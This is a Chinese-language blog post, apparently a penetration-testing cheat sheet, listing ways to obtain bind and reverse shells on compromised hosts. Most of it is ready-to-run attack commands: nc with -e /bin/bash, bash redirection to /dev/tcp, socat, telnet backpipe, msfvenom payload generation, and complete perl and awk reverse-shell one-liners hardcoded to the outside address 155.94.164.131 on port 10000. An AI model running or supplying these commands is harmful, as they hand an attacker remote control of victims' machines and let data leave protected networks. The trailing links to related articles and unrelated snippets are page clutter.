内网渗透之跨边界传输 - 反弹shell
大年初一,当然是更一篇重磅文章啦
反弹shell
/bin目录下带sh的都是shell
nc
1.正向连接,目标机监听自身端口,攻击机主动建立连接
目标机:nc -lvvp 端口 -e /bin/bash (-e cmd.exe)
- 攻击机:nc -vv 目标IP 监听端口
适用情况:目标机有独立外网ip,攻击机有无都行
2.反向连接,攻击机监听自身端口,目标机主动建立连接
攻击机:nc -lvvp 端口
- 目标机:nc -vv 攻击机ip 端口 -e /bin/bash
适用情况:攻击机有独立外网ip,目标机在内网,只有一个或多个映射端口
3.聊天/传文件
- 攻击机:nc -lvvp 端口 < 文件
- 目标机:nc -vv 攻击机IP 攻击机端口 > 文件
注意:有防火墙会连不上,得找放过的端口
bash
攻击机监听:nc -lvvp 端口
目标机:bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1
- 把bash重定向
使用kali下msfvenom生成payload
- msfvenom -l payloads | grep bash #搜索payload制作命令
msfvenom -p cmd/unix/reverse_bash LHOST=攻击机IP LPORT=攻击机端口 #制作payload
- 目标机运行payload:0<&209-;exec 209<>/dev/tcp/192.168.123.123/12345;sh <&209 >&209 2>&209
- sh可换成任意一个bash或shell
适用情况:bash -i 被屏蔽,以及nc没有 -e 参数
ksh/tsh/zsh/sh
- 攻击机监听:nc -lvvp 端口
目标机发送
- ksh -c 'ksh > /dev/tcp/攻击机ip/端口 2>&1
socat
命令最后加个&把进程放到后台
jobs查看TCP
- 攻击机监听:socat TCP-LISTEN:端口 -
目标机发送:
linux
- socat exec:'bash -i',pty,stderr,setsid,sigint,sane tcp:攻击机ip:端口
windows
- socat.exe exec:'cmd.exe',pty,stderr,setsid,sigint,sane tcp:攻击机ip:端口
UDP
- 攻击机监听:socat udp-listen:端口 -
目标机发送:
linux
- socat udp-connect:攻击机ip:端口 exec:'bash -i',pty,stderr,sane 2>&1>/dev/null
windows
- socat.exe udp-connect:攻击机ip:端口 exec:'cmd.exe',pty,stderr,sane
telnet
- mknod backpipe p && telnet 攻击机ip 端口 0<backpipe | /bin/bash 1>backpipe
perl
- 攻击机监听
目标机发送
输入msfvenom生成的payload
- perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"155.94.164.131:10000");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
awk
其他步骤一样,略
- awk 'BEGIN{s="/inet/tcp/0/155.94.164.131/10000";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
ruby
- 同上
python
攻击机监听
- nc -lvvp 端口
目标机发送
- 使用msfvenom生成payload
- 输入payload
java
- 同上
php
- 生成payload保存到文件中
msfvenom -p php/reverse_php lhost=攻击机ip lport=端口 - f php -o /路径/shell.php
- 复制到目标机运行
使用msfvenom
- msfvenom -l payloads | grep xxx #搜索可利用payload
- msfvenom -p 要使用的payload生成脚本 lhost=攻击机ip lport=攻击机端口
内网渗透之跨边界传输 - 反弹shell的更多相关文章
- 内网渗透之跨边界传输 - LCX转发
跨边界转发 端口转发 lcx 流程 目标机 ./lcx -slave 跳板机ip 监听的端口 127.0.0.1 要转发的端口 跳板机(公网) ./lcx -listen 监听的端口 转发给攻击机访问 ...
- [源码]Python简易http服务器(内网渗透大文件传输含下载命令)
Python简易http服务器源码 import SimpleHTTPServerimport SocketServerimport sysPORT = 80if len(sys.argv) != 2 ...
- Linux内网渗透
Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的.本片文章将从拿到一个Linux shell开始,介绍Linux内网渗 ...
- metasploit渗透测试笔记(内网渗透篇)
x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. r ...
- Metasploit 内网渗透篇
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. ...
- 内网渗透之vlunstack靶场
前言:vlunstack靶场是由三台虚拟机构成,一台是有外网ip的windows7系统(nat模式),另外两台是纯内网机器(外网ping不通),分别是域控win2008和内网主机win2003,这里就 ...
- 内网渗透测试思路-FREEBUF
(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...
- 7.内网渗透之windows认证机制
文章参考自三好学生域渗透系列文章 看了内网渗透第五篇文章,发现如果想要真正了解PTT,PTH攻击流程,还需要了解windows的认证机制,包括域内的kerberos协议. windows认证机制 在域 ...
- 3.内网渗透之reGeorg+Proxifier
aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxIAAAE2CAIAAAB6BDOVAAAgAElEQVR4Aey9Z5Aex3X327MRGVzkRH ...
随机推荐
- Leetcode14._最长公共前缀
题目 编写一个函数来查找字符串数组中的最长公共前缀. 如果不存在公共前缀,返回空字符串 "". 示例 1: 输入: ["flower","flow&q ...
- Redmine it!
redmine插件开发简介 最稳妥的学习应该是先看官方文档,官方还给了一个具体的插件开发教程,不过如果一步不差按照教程敲代码,其实会发现还是有些问题的,需要稍稍改动. 这里,我自己编写了一个简单的插件 ...
- LeetCode Day 10
LeetCode0020 给定一个只包括 '(',')','{','}','[',']' 的字符串,判断字符串是否有效. 有效字符串需满足: 左括号必须用相同类型的右括号闭合. 左括号必须以正确的顺序 ...
- async包 ES6 async/await的区别
最基本的async 包 ApCollection.find({}).toArray(function (err, aps) { var num = 0; async.whilst( function ...
- 简单的文件上传服务器(上传到FastDFS服务器)
现在文件服务器使用越来越多,其中FastDFS文件服务器非常出色,可以支持分布式存储,多文件系统集群和多主机备份 环境中使用的文件服务器为172.16.100.10,其中trackerd服务和stor ...
- ssm框架下怎么批量删除数据?
ssm框架下批量删除怎么删除? 1.单击删除按钮选中选项后,跳转到js函数,由函数处理 2. 主要就是前端的操作 js 操作(如何全选?如何把选中的数据传到Controller中) 3.fun()函数 ...
- 机器学习入门 - 逻辑(Logistic)回归(5)
原文地址:http://www.bugingcode.com/machine_learning/ex7.html 把所有的问题都转换为程序问题,可以通过程序来就问题进行求解了. 这里的模拟问题来之于C ...
- shell的循环嵌套语法
测试shell的循环嵌套语法 [root@localhost test]# vi Xunhuanqiantao.sh #!/bin/bash #程序功能描述: # 测试循环嵌套 #作者:孤舟点点 #版 ...
- Windows下python3登陆和操作linux服务器
一.环境准备 python3远程连接需要用到pycrytodome和paramiko库,其中后者依赖前者,所以按照顺序来安装 1. 安装pycrytodome 1 pip install pycryt ...
- 杀死众筹的N种方法:没想到山寨大军也参与了
众筹作为当下创业者筹集资金,将创意变为现实的最重要手段之一,正面临着越来越多的困难,甚至衍生出杀死众筹的N种方法.甚至这些方法还分为了两类,就众筹本身看,杀死它们的主要方法是:创业者卷钱跑路. ...